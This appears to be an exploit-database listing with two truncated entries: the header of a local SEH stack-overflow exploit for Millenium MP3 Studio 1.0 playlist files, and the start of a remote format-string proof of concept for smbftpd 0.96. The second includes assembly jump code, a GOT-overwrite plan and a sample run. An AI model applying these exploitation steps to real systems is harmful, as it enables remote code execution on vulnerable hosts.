MP3 Studio 1.0 Stack Overflow

Vulnerability : .mpf /.m3u File Local Stack Overflow Exploit SEH 1 + Product : Millenium MP3 Studio + Versions affected : v1.0 + Download : http://www.software112.com/products/mp3-millennium+download.html + Method : / + Tested on : Windows XP SP3 En + Written by : corelanc0d3r...

smbftpd 0.96 - SMBDirList-function Remote Format String

/ smbftpd 0.96 Proof of concept tested with smbftpd 0.96 compiled with gcc 3.3.6 1. write jumpcode to BSS mov dx, 0x1234 pop eax cmp ax, dx jne $-4 jmp esp 2. overwrite a GOT entry with the addr to BSS & send shellcode jerry: ./bleh -h localhost + GOT: 0x80591d8 - .bss jmpcode: 0x805a791 +...